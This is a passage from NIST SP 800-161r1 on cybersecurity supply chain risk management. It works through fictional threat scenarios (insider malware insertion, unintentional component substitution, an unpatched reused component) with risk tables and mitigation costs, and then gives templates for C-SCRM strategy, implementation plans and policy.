Based on this information, ABC Company developed the following fictitious threat event for
analysis:
John Poindexter, a disgruntled employee of the integration company, decides to insert
some open source malware into a component of the system. He then resigns from the
firm, leaving no trace of his work. The malware has the ability to call home to John and
provide him access to stop or allow network traffic at any or all 50 of the transportation
stations. As a result, unpredictable, difficult-to-diagnose disruptions would occur,
causing significant monetary losses and safety concerns.
After a risk assessment was conducted using [NIST SP 800-30, Rev. 1], management decided
that the acceptable level of risk for this scenario was “Moderate.”
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
186
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Threat Scenario Analysis
If John were successful, a potential course of events could occur as follows:
John conducts a trial run, shutting off the services of one station for a short time. It would
be discounted as a fluke and have minimal impact. Later, John would create increasingly
frequent disruptions at various stations. These disruptions would cause anger among
employees and customers, as well as some safety concerns. The integration company
would be made aware of the problem and begin to investigate the cause. They would
create a workaround and assume that there was a bug in the system. However, because
the malicious code would be buried and difficult to identify, the integration company
would not discover it. John would then create a major disruption across several
transportation systems at once. The workaround created by the integration company
would fail due to the size of the attack, and all transportation services would be halted.
Travelers would be severely impacted and the media alerted. The method of attack would
be identified and the system modified to prevent John from accessing the system again.
However, the underlying malicious code would remain. Revenue would decrease
significantly for several months. Legal questions would arise. Resources would be
invested in assuring the public that the system was safe.
Mitigating Practices
ABC Company identified the following potential areas for improvement:
• Establish and retain identification of supply chain elements, processes, and actors [SR-4].
• Control access and configuration changes within the SDLC, and require periodic code
reviews (e.g., manual peer-review) [AC-1, AC-2, CM-3].
• Require static code testing [RA-9].
• Establish incident handling procedures [IR-4].
Table C-5: Scenario 4
Threat Scenario
Threat Source
Integrator– Malicious Code Insertion
Vulnerability
Minimal oversight of integrator activities; no checks and
balances for any individual inserting a small piece of code
Threat Event
Description
A disgruntled employee of an integrator company inserts
malicious functionality into traffic navigation software and
then leaves the ABC Company.
Existing Practices
Integrator: peer-review process
Acquirer: Contract that sets down time, cost, and
functionality requirements
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
187
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Threat Event
Outcome
50 large metro locations and 500 instances affected by
malware. When activated, the malware causes major
disruptions to traffic.
Enterprise units, processes,
information, assets, or
stakeholders affected
Traffic Navigation System
Implementation company
Legal
Public Affairs
Risk
Impact
High – Traffic disruptions are major and last for two weeks
while a work-around is created. Malicious code is not
discovered and remains a vulnerability.
Likelihood
High
Risk exposure
(Impact x Likelihood)
High
Acceptable Level of
Risk
Moderate
Mitigation
Potential Mitigating
Strategies and C-
SCRM Controls
C-SCRM_AC-1; C-SCRM_AC-2; C-SCRM_CM-3; C-SCRM_IR-2;
C-SCRM_SA-10; C-SCRM_SA-11
Estimated Cost of
Mitigating Strategies
$2.5 million
Change in Likelihood
High Low
Change in Impact
High (no change)
Selected Strategies
Combination of strategies using the mitigation noted
Estimated Residual
Risk
Moderate
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
188
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
SCENARIO 5: Unintentional Compromise
Background
Uninformed insiders replace components with more cost-efficient solutions without
understanding the implications to performance, safety, and long-term costs.
ABC Company has concerns about its acquisition policies and has decided to conduct a threat
scenario analysis to identify mitigating practices. Any practices selected must be applicable to a
variety of projects and have significant success within a year.
Environment
ABC Company acquires many different systems with varying degrees of requirements. Because
of the complexity of the environment, ABC Company officials decide that they should use a
scenario based on an actual past event.
Threat Event
Using an actual event as a basis, the agency designs the following threat event narrative:
Gill, a newly hired program manager, is tasked with reducing the cost of a $5 million
system being purchased to support complex research applications in a unique physical
environment. The system would be responsible for relaying information regarding
temperature, humidity, and toxic chemical detection, as well as storing and analyzing
various data sets. There must not be any unscheduled outages more than 10 seconds long,
or serious safety concerns and the potential destruction of research will occur. ABC
Company’s threat assessment committee determined that the acceptable level of risk for
this type of event has a score of 2/10.
Gill sees that a number of components in the system design are priced high compared
with similar components he has purchased in the commercial acquisition space. Gill asks
John, a junior engineer with the integration company, to replace several load balancers
and routers in the system design to save costs.
Threat Scenario Analysis
ABC Company decides that there are three potential outcomes to the scenario:
1. It is determined that the modifications are inadequate before any are purchased (30 %
chance, no impact);
2. It is determined that the modifications are inadequate during testing (40 % chance, low
impact); or
3. The inadequacy of the modifications is undetected, and the routers are installed in the
system, begin to fail, and create denial-of-service incidents (30 % chance, high impact).
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
189
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Mitigating Strategies
Three potential mitigating strategies are identified:
• Improve the existing training program [Ref. AT-1], and add configuration management
controls to monitor all proposed changes to critical systems [Ref. CM-1];
• Improve the testing requirements [Ref. SA-11]; and
• Require redundancy and heterogeneity in the design of systems [Ref. SC-29, SC-36].
Adding configuration management controls would increase the likelihood that the modifications
were rejected either at the initial stage or during testing, but it was determined that a $200,000
investment in training alone could not bring the level of risk to an acceptable level in the time
required.
Improving the testing requirements would increase the likelihood of the modifications being
rejected during testing, but it was determined that no amount of testing alone could bring the
level of risk to an acceptable level.
Requiring redundancy and heterogeneity in the design of the system would significantly reduce
the impact of this and other events of concern but could double the cost of a project. In this
scenario, it was determined that an investment of $2 million would be required to bring the risk
to an acceptable level.
As a result of this analysis, ABC Company decides to implement a combination of practices:
• A mandatory, day-long training program for those handling the acquisition of critical
systems and the addition of configuration management controls that require that changes
be approved by a configuration management board (CMB) ($80,000 initial investment),
• $60,000 investment in testing equipment and software for critical systems and elements,
and
• Redundancy and diversity of design requirements, as deemed appropriate for each
project.
It was determined that this combination of practices would be most cost-effective for a variety of
projects and help mitigate the risk from a variety of threats.
Table C-6: Scenario 5
Threat Scenario
Threat Source
Internal Employee – Unintentional Compromise
Vulnerability
Lax training practices
Threat Event
Description
A new acquisition officer (AO) with experience in
commercial acquisition is tasked with reducing hardware
costs. The AO sees that a number of components are
priced high and works with an engineer to change the
purchase order.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
190
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Existing Practices
Minimal training program that is not considered mandatory
Basic testing requirements for system components
Threat Event
Outcome
Change is
found
unsuitable
before
purchase.
Change is
found
unsuitable in
testing.
Change passes testing,
and routers are installed
and start to fail, causing
denial of service.
Enterprise units, processes,
information, assets, or
stakeholders affected.
None
Acquisitions
Acquisitions, System,
Users
Risk
Impact
None
Low
High
Likelihood
Moderate: 30
%
High: 40 %
Moderate: 30 %
Risk Exposure
(Impact x Likelihood)
None
Moderate
Moderate
Acceptable Level of
Risk
Low
Moderate
High
Mitigation
Potential Mitigating
Strategies and SCRM
Controls
Improve
training
program, and
require that
changes be
approved by
CMB.
Improve
acquisition
testing.
Improve the design of
the system.
Estimated Cost of
Mitigating Strategies
$200,000
---
$2 million
Change in Impact
None – No
Change
Low – No
Change
High Low
Change in Likelihood
30 % 10 %
40 % 20 %
30 % No Change
New Risk Exposure
None
Low
Moderate
Selected Strategies
Require mandatory training for those working on critical
systems, and require approval of changes to critical
systems by a configuration management board (cost =
$100,000).
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
191
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Residual Risk
Low
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
192
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
SCENARIO 6: Vulnerable Reused Components Within Systems
Background
As part of their standard development practices, ABC Company reuses internally developed and
open source system components in the development of their COTS solutions. Recent high-profile
cyber attacks have capitalized on vulnerabilities present in reused system components, and ABC
Company’s customers are demanding increased transparency as a means of mitigating their own
risk exposure.
ABC Company has decided to perform a threat scenario analysis to determine which steps can be
taken to improve the security of their software products and offer customers greater confidence
that ABC Company is taking the necessary steps to protect them from these types of attacks.
Environment
ABC Company is a well-known market-leader in the financial planning and analysis (FP&A)
software market. ABC Company’s customers rely on Acme’s FP&A solution to store, process,
and analyze sensitive financial information (e.g., closing the books).
Threat Event
Apache Struts (a widely-used software component) is used as a component within ABC
Company’s COTS FP&A solution. A vulnerability present in Apache Struts was patched in
March of 2021. Motivated by financial gain, opportunistic cyber-criminal organizations sought
opportunities to capitalize on vulnerabilities in COTS solutions.
ABC Company provides frequent updates to mitigate software vulnerabilities in their COTS
solutions. However, in this case, the software component in question was not included as part of
these updates.
The vulnerability in question is present and exploitable within ABC Company’s FP&A solution.
Threat Scenario Analysis
If the attackers were to discover the vulnerability in ABC Company’s product, a potential course
of events could occur as follows:
A well-resourced cyber-criminal organization could install rogue code in customer
instances of the FP&A solution. Using this rogue code, the cyber criminals could extract
and sell the sensitive, undisclosed financial information of public companies that trade on
global stock markets. Upon discovery of the attack, ABC Company could face significant
reputational harm due to the negative publicity. ABC Company’s customers may engage
in legal action against ABC Company as a result of their failure to appropriately patch
known vulnerabilities in their software products.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
193
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Mitigating Strategies
ABC Company identified the following areas for improvement in order to enhance their secure
software development practices and improve the confidence in their products:
• Ensure that developers receive training on secure development practices and are
instructed on the use of vulnerability tooling so that developed software is secure.
• Ensure that reused system components – whether developed internally or open source –
are evaluated as part of a standard process for known vulnerabilities (Ref. SA-15).
• Maintain a system component inventory to aid in maintenance of the software product
throughout its life cycle (Ref. CM-8).
• Continuously monitor system components for vulnerabilities that arise, and ensure that
appropriate processes are in place for expeditious remediation once a fix is available.
Automate this process where possible (Ref. CA-7, RA-5).
Table C-7: Scenario 6
Threat Scenario
Threat Source
Cyber Criminal Organization – Vulnerable Software
Components
Vulnerability
Failure to understand and monitor the vulnerability state of
reused components used in FP&A software products and
provide timely updates to patch known vulnerabilities
Threat Event
Description
A cyber criminal organization exploits a known vulnerability
in an FP&A software product to install rogue code and gain
access to sensitive financial information contained within
the application instances used by ABC Company customers.
Existing Practices
ABC Company has a comprehensive and secure SDLC that
focuses on identifying and mitigating vulnerabilities within
their in-house developed code. ABC Company releases
frequent patches to close vulnerabilities in their products.
Threat Event
Outcome
More than 10 major ABC Company customers are
compromised as a result of the vulnerable software.
Negative press surrounding the attack has led to significant
impact (i.e., 5 % drop) to ABC Company’s share price. ABC
Company’s competitors are capitalizing on the attack and
using their own security practices to differentiate
themselves and gain market share. ABC Company faces
significant legal costs due to action taken by affected
customers. ABC Company has seen a 5 % abnormal
customer churn in the year following the attack.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
194
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Enterprise units, processes,
information, assets, or
stakeholders affected
FP&A Software Products Division
Risk
Impact
High – $350 million in aggregate cost, substantial
reputational impact, and loss of market share, share price,
and customers
Likelihood
High – 20 % annual probability of occurrence
Risk exposure
(Impact x
Likelihood)
High: $70 million loss exposure
Acceptable Level of
Risk
Moderate – $20 million: ABC Company’s Risk Committee
has stated that it is unwilling to lose more than $20 million
due to a single cybersecurity event affecting customer
products.
Mitigation
Potential Mitigating
Strategies and SCRM
Controls
• Ensure that developers receive training on secure
development practices and are instructed on the use of
vulnerability tooling so that developed software is
secure.
• Ensure that reused system components – whether
developed internally or open source) are evaluated as
part of a standard process for known vulnerabilities
(Ref. SA-15).
• Maintain a system component inventor to aid in the
maintenance of the software product throughout its
life cycle (Ref. CM-8).
• Continuously monitor system components for
vulnerabilities that arise, and ensure that appropriate
processes are in place for expeditious remediation
once a fix is available. Automate this process where
possible (Ref. CA-7, RA-5).
Estimated Cost of
Mitigating Strategies
• Developer training: $500-$800K
• System Component Inventory Process: $1.2-1.5
million
• Continuous Monitoring of System Component
Vulnerabilities: $800K – $1.2 million
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
195
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Change in Impact
High $350 million (no change based on identified controls)
Change in Likelihood Low 5 % annual probability of occurrence
New Risk Exposure
Moderate: $17.5 million
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
196
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
APPENDIX D: C-SCRM TEMPLATES42
1. C-SCRM STRATEGY AND IMPLEMENTATION PLAN
To address cybersecurity risks throughout the supply chain, enterprises develop a C-SCRM
strategy. The C-SCRM strategy, accompanied by an implementation plan, is at the enterprise
level (Level 1), though different mission and business areas (Level 2) may further tailor the C-
SCRM strategy to address specific mission and business needs, as outlined at the enterprise level.
The C-SCRM strategy and implementation plan should anchor to the overarching enterprise risk
management strategy and comply with applicable laws, executive orders, directives, and
regulations.
Typical components of the strategy and implementation plan, as outlined in the below template,
include strategic approaches to reducing an enterprise’s supply chain risk exposure via
enterprise-wide risk management requirements, ownership, risk tolerance, roles and
responsibilities, and escalation criteria. Note that the strategy and implementation plan may be
developed as a single document or split apart into multiple documents. In any case, these C-
SCRM outputs should be closely related in nature.
1.1. C-SCRM Strategy and Implementation Plan Template
1.1.1. Purpose
Outline the enterprise’s high-level purpose for the strategy and implementation document,
aligning that purpose with the enterprise’s mission, vision, and values. Describe where the
strategy and implementation document reside relative to other C-SCRM documentation that must
be maintained at various tiers. Provide clear direction around the enterprise’s C-SCRM
priorities and its general approach for achieving those priorities.
Sample Text
The purpose of this strategy and implementation document is to provide a strategic roadmap for
implementing effective C-SCRM capabilities, practices, processes, and tools within the
enterprise in support of its vision, mission, and values.
The strategic approach is organized around a set of objectives that span the scope of the
enterprise’s mission and reflect a phased, achievable, strategic approach to ensuring the
successful implementation and effectiveness of C-SCRM efforts across the enterprise.
This strategy and implementation document discusses the necessary core functions, roles,
responsibilities, and the approach that the enterprise will take to implement C-SCRM capabilities
within the enterprise. As mission and business policies and system plans are developed and
completed, they will be incorporated as attachments to this document. All three tiers of
documentation should be periodically reviewed together to ensure cohesion and consistency.
42 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
197
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
The focus of this strategy and implementation plan is intentionally targeted at establishing a core
foundational capability. These baseline functions – such as defining policies, ownership, and
dedicated resources – will ensure that the enterprise can expand and mature its C-SCRM
capabilities over time. This plan also acknowledges and emphasizes the need to raise awareness
among staff and ensure proper training in order to understand C-SCRM and grow the
competencies necessary to be able to perform C-SCRM functions.
This initial strategy and implementation plan also recognizes dependencies on industry-wide
coordination efforts, processes, and decisions. As government and industry-wide direction,
process guidance, and requirements are clarified and communicated, the enterprise will update
and refine its strategy and operational implementation plans and actions.
1.1.2. Authority and Compliance
List the laws, executive orders, directives, regulations, policies, standards, and guidelines that
govern C-SCRM Strategy and Implementation.
Sample Text
• Legislation
o Strengthening and Enhancing Cyber-capabilities by Utilizing Risk Exposure
Technology Act (SECURE) Technology of 2018
o Federal Information Security Modernization Act of 2014
o Section 889 of the 2019 National Defense Authorization Act – “Prohibition on
Certain Telecommunications and Video Surveillance Services or Equipment”
o Gramm-Leach-Bliley Act
o Health Insurance Portability and Accountability Act
o Executive Order 14028 of May 12, 2021, Improving the Nation’s Cybersecurity
• Regulations
o NYDFS 23 NYCRR 500: Section 500.11 Third Party Service Provider Security
Policy
o CIP-013-1: Cyber Security – Supply Chain Risk Management
o FFIEC Information Security Handbook II.C.20: Oversight of Third-Party Service
Providers
• Guidelines
o NIST 800-53, Revision 5: CA-5, SR-1, SR-2, SR-3
o NIST 800-37, Revision 2
o NIST 800-161, Revision 1: Appendix C
o ISO 28000:2007
1.1.3. Strategic Objectives
Strategic objectives establish the foundation for determining enterprise-level C-SCRM controls
and requirements. Each objective supports achievement of the enterprise’s stated purpose in
pursuing sound C-SCRM practices and risk-reducing outcomes. Together, the objectives provide
the enterprise with the essential elements needed to bring C-SCRM capabilities to life, and
effectively pursue the enterprise’s purpose.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
198
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
In aggregate, strategic objectives should address essential C-SCRM capabilities and enablers,
such as:
• Implementing a risk management hierarchy and risk management approach
• Establishing an enterprise governance structure that integrates C-SCRM requirements
and incorporates these requirements into enterprise policies
• Defining a supplier risk assessment approach
• Implementing a quality and reliability program that includes quality assurance and
quality control processes and practices
• Establishing explicit collaborative roles, structures, and processes for supply chain,
cybersecurity, product security, and physical security (and other relevant) functions
• Ensuring that adequate resources are dedicated and allocated to information security and
C-SCRM to ensure the proper implementation of policy, guidance, and controls
• Implementing a robust incident management program to successfully identify, respond to,
and mitigate security incidents
• Including critical suppliers in contingency planning, incident response, and disaster
recovery planning and testing
Sample Text
Objective 1: Effectively manage cybersecurity risks throughout the supply chain
This objective addresses the primary intent of the enterprise’s pursuit of C-SCRM.
Establishing and sustaining an enterprise-wide C-SCRM program will enable the
enterprise’s risk owners to identify, assess, and mitigate supply chain risk to the
enterprise’s assets, functions, and associated services. Implementing an initial capability
that can sustain and grow in scope of focus, breadth, and depth of function will be done
in phases and will incorporate holistic “people, process, and technology” needs to ensure
that the enterprise is able to achieve desired C-SCRM goals in areas such as improving
enterprise awareness, protection, and resilience.
Objective 2: Serve as a trusted source of supply for customers
Addressing customer supply chain risks at scale and across the enterprise’s diverse
portfolio demands a prioritization approach, structure, improved processes, and ongoing
governance. C-SCRM practices and controls need to be tailored to address the distinct
and varied supply chain threats and vulnerabilities that are applicable to the enterprise’s
customers. This objective can be achieved by:
• Strengthening vetting processes, C-SCRM requirements, and oversight of external
providers and
• Ensuring that customer needs are met in line with their cybersecurity risk appetite,
tolerance, and environment.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
199
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Objective 3: Position the enterprise as an industry leader in C-SCRM
The enterprise is well-positioned to enable and drive forward improvements that address
how cybersecurity risk is managed in supply chains across the industry. Therefore, the
enterprise must use this position to advocate for communication, incentivization, and the
education of industry players about the enterprise’s requirements and expectations related
to addressing supply chain risk.
1.1.4. Implementation Plan and Progress Tracking
Outline the methodology and milestones by which the progress of the enterprise’s C-SCRM
strategic objectives will be tracked. Though enterprise context heavily informs this process,
enterprises should define prioritized time horizons to encourage the execution of tasks that are
critical or foundational in nature. A common nomenclature for defining such time horizons is
“crawl, walk, run” Regardless of the designated time horizon, the implementation of practical,
prioritized plans is essential to building momentum in the establishment or enhancing C-SCRM
capabilities.
Once the implementation plan is baselined, an issue escalation process and feedback mechanism
are included to drive change to the implementation plan and progress tracking.
Sample Text
[The enterprise’s] execution of its C-SCRM strategic objectives and the sustained operational
effectiveness of underlying activities require a formal approach and commitment to progress
tracking. [The enterprise] will track and assess implementation of its strategic objectives by
defining subsidiary milestones and implementation dates in an implementation plan. Monitoring
and reporting on elements of the implementation plan require shared responsibilities across
multiple disciplines and a cross-enterprise, team-based approach.
The following implementation plan will be continuously maintained by mission and business
owners and reviewed by the senior leadership team as a part of regular oversight activities. Risks
and issues that impact the implementation plan should be proactively raised to senior leadership
team by mission and business owners or their team. The implementation plan may then be
revised in accordance with the senior leadership’s discretion.
Table D-1: Objective 1 – Implementation milestones to effectively manage cybersecurity
risks throughout the supply chain
Implementation Plan Milestone
Status
Owner
Priority
Target Date
Establish policy and authority
Planned
J. Doe
Do Now
XX/XX/XX
Establish and provide executive
oversight and direction
Complete
…
Do Next
…
Integrate C-SCRM into the enterprise
risk management (ERM) framework
Delayed
…
Do Later
…
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
200
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Implementation Plan Milestone
Status
Owner
Priority
Target Date
Establish a C-SCRM PMO capability
Cancelled
…
…
…
Establish roles and responsibilities, and
assign accountability
…
…
…
…
Develop C-SCRM plans
…
…
…
…
Establish the internal awareness
function
…
…
…
…
Identify, prioritize, and implement
supply chain risk assessment
capabilities
…
…
…
…
Establish, document, and implement
enterprise-level C-SCRM controls
…
…
…
…
Identify C-SCRM resource
requirements, and secure sustained
funding
…
…
…
…
Establish C-SCRM program
performance monitoring
…
…
…
…
Table D-2: Objective 2 – Implementation milestones for serving as a trusted source of
supply for customers
Implementation Plan Milestone
Status
Owner
Priority
Target Date
Incorporate C-SCRM activities,
customer-facing business lines,
programs, and solution offerings
Planned
J. Doe
Do Now
XX/XX/XX
Ensure that customer support personnel
are well-versed in management
requirements and cybersecurity risks
throughout the supply chain
Complete
…
Do Next
…
Establish minimum baseline levels of
cybersecurity supply chain assurance
Delayed
…
Do Later
…
Establish processes to respond to
identified risks and to monitor for
impacts to the enterprise’s supply chain
Cancelled
…
…
…
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
201
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Table D-3: Objective 3 – Implementation milestones to position the enterprise as an
industry leader in C-SCRM
Implementation Plan Milestone
Status
Owner
Priority
Target Date
Coordinate and engage with national
security and law enforcement to ensure
rapid access to mission-critical supply
chain threats
Planned
J. Doe
Do Now
XX/XX/XX
Evaluate C-SCRM improvement
opportunities, and strengthen
requirements and oversight for
industry-wide common solutions and
shared services
Complete
…
Do Next
…
Advocate for C-SCRM awareness and
competency through training and
workforce development, to include
secure coding training for developers
Delayed
…
Do Later
…
Release white papers and public
guidance related to C-SCRM
Cancelled
…
…
…
1.1.5. Roles and Responsibilities
Designate those responsible for the Strategy and Implementation template, as well as its key
contributors. Include the role and name of each individual or group, as well contact information
where necessary (e.g., enterprise affiliation, address, email address, and phone number).
Sample Text
• Senior leadership shall:
o Endorse the enterprise’s C-SCRM strategic objectives and implementation plan,
o Provide oversight of C-SCRM implementation and effectiveness,
o Communicate C-SCRM direction and decisions for priorities and resourcing
needs,
o Determine the enterprise’s risk appetite and risk tolerance, and
o Respond to high-risk C-SCRM issue escalations that could impact the enterprise’s
risk posture in a timely manner.
• Mission and business owners shall:
o Determine mission-level risk appetite and tolerance, ensuring that they are in line
with enterprise expectations;
o Define supply chain risk management requirements and the implementation of
controls that support enterprise objectives;
o Maintain criticality analyses of mission functions and assets; and
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
202
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
o Perform risk assessments for mission and business-related procurements.
1.1.6. Definitions
List the key definitions described within the Strategy and Implementation template, and provide
enterprise-specific context and examples where needed.
Sample Text
• Enterprise: An organization with a defined mission, goal, and boundary that uses
information systems to execute that mission and has the responsibility for managing its
own risks and performance. An enterprise may consist of all or some of the following
business aspects: acquisition, program management, financial management (e.g.,
budgets), human resources, security, and information systems, information, and mission
management.
• Objective: An enterprise’s broad expression of goals and a specified target outcome for
operations.
1.1.7. Revision and Maintenance
Define the required frequency of Strategy and Implementation template revisions. Maintain a
table of revisions to enforce version control. Strategy and Implementation templates are living
documents that must be updated and communicated to all appropriate individuals (e.g., staff,
contractors, and suppliers).
Sample Text
[The enterprise’s] Strategy and Implementation template must be reviewed every 3-5 years
(within the federal environment), at a minimum, since changes to laws, policies, standards,
guidelines, and controls are dynamic and evolving. Additional criteria that may trigger interim
revisions include:
• Change of policies that impact the Strategy and Implementation template,
• Significant Strategy and Implementation events,
• The introduction of new technologies,
• The discovery of new vulnerabilities,
• Operational or environmental changes,
• Shortcomings in the Strategy and Implementation template,
• Change of scope, and
• Other enterprise-specific criteria.
Table D-4: Version Management Table
Version
Number
Date
Description of
Change/Revision
Section/Pages
Affected
Changes made by
Name/Title/Enterprise
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
203
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
2. C-SCRM POLICY
The C-SCRM policies direct the implementation of the C-SCRM strategy. The C-SCRM policies
can be developed at Level 1 and/or at Level 2 and are informed by mission- and business-
specific factors, including risk context, risk decisions, and risk activities from the C-SCRM
strategy. The C-SCRM policies support applicable enterprise policies (e.g., acquisition and
procurement, information security and privacy, logistics, quality, and supply chain). The C-
SCRM policies address the goals and objectives outlined in the enterprise’s C-SCRM strategy,
which in turn is informed by the enterprise’s strategic plan. The C-SCRM policies should also
address mission and business functions, as well as internal and external customer requirements.
C-SCRM policies also define the integration points for C-SCRM with the risk management
processes for the enterprise. Finally, the C-SCRM policies the C-SCRM roles and
responsibilities within the enterprise define at a more specific and granular level, any
interdependencies among those roles, and the interaction between the roles. The C-SCRM
policies at Level 1 are broader, whereas the C-SCRM policies at Level 2 are specific to the
mission and business function. C-SCRM roles specify the responsibilities for procurement,
conducting risk assessments, collecting supply chain threat intelligence, identifying and
implementing risk-based mitigations, monitoring, and other C-SCRM functions.
2.1. C-SCRM Policy Template
2.1.1. Authority and Compliance
List the laws, executive orders, directives, regulations, policies, standards, and guidelines that
govern the C-SCRM policy.
Sample Level 1 Text
• Policies
o [Enterprise Name] Enterprise Risk Management Policy
o [Enterprise Name] Information Security Policy
• Legislation
o Strengthening and Enhancing Cyber-capabilities by Utilizing Risk Exposure
Technology Act (SECURE) Technology of 2018
• Regulations
o NYDFS 23 NYCRR 500: Section 500.11 Third-Party Service Provider Security
Policy
o CIP-013-1: Cyber Security – Supply Chain Risk Management
o FFIEC Information Security Handbook II.C.20: Oversight of Third-Party Service
Providers
Sample Level 2 Text
• Policies
o [Enterprise Name] C-SCRM Policy
o [Mission and Business Process Name] Information Security Policy
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
204
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Regulations
o NYDFS 23 NYCRR 500: Section 500.11 Third-Party Service Provider Security
Policy
• Guidelines
o NIST 800-53, Revision 5: SR-1, PM-9, PM-30, PS-8, SI-12
o NIST 800-161, Revision 1: Appendix C
2.1.2. Description
Describe the purpose and scope of the C-SCRM policy, outline the enterprise leadership’s intent
to adhere to the plan, enforce its controls, and ensure that it remains current. Define the tier(s)
at which the policy applies. C-SCRM policies may need to be derived in whole or in part from
existing policies or other guidance.
For Level 2, C-SCRM policies should list all Level 1 policies and plans that inform the Level 2
policies, provide a brief explanation of what the mission and business encompass, and briefly
describe the scope of applicability (e.g., plans, systems, type of procurements, etc.) for the Level
2 C-SCRM policies.
Sample Level 1 Text
[The enterprise] is concerned about the risks in the products, services, and solutions bought,
used, and offered to customers.
The policy objective of the [the enterprise’s] C-SCRM Program is to successfully implement and
sustain the capability of providing improved assurance that the products, services, and solutions
used and offered by [the enterprise] are trustworthy, appropriately secure and resilient, and able
to perform to the required quality standard.
C-SCRM is a systematic process for identifying and assessing susceptibilities, vulnerabilities,
and threats throughout the supply chain and implementing strategies and mitigation controls to
reduce risk exposure and combat threats. The establishment and sustainment of an enterprise-
wide C-SCRM Program will enable [the enterprise’s] risk owners to identify, assess, and
mitigate supply chain risk to [the enterprise’s] mission assets, functions, and associated services.
Sample Level 2 Text
[The mission and business process] recognizes its criticality to [the enterprise’s objectives]. A
key component of producing products involves coordinating among multiple suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related
service providers. [The mission and business process] recognizes that the realization of
cybersecurity risks throughout the supply chain may disrupt or completely inhibit [the mission
and business process’s] ability to generate products in a timely manner and in accordance with
the required quality standard.
Based on the C-SCRM objectives set forth by [Enterprise Level 1 Policy], [the mission and
business process’s] policy objective is to implement C-SCRM capabilities that allow for the
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
205
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
assessment, response, and monitoring of cybersecurity risks throughout the supply chain. C-
SCRM capabilities that align with the policy and requirements set forth by the enterprise-wide C-
SCRM program will provide the boundaries within which [the mission and business process]
will tailor C-SCRM processes and practices to meet the unique requirements associated with
sourcing components and assembling key products.
2.1.3. Policy
Outline the mandatory high-level policy statements that underpin the goals and objectives of the
enterprise’s C-SCRM strategic plan, mission and business functions, and internal and external
customer requirements.
Sample Level 1 Text
[The enterprise’s] enterprise-level C-SCRM Program is established to implement and sustain the
capability to:
• Assess and provide appropriate risk response to cybersecurity risks that arise from the
acquisition and use of covered articles;
• Prioritize assessments of cybersecurity risks throughout the supply chain and risk
response actions based on criticality assessments of the mission, system, component,
service, or asset;
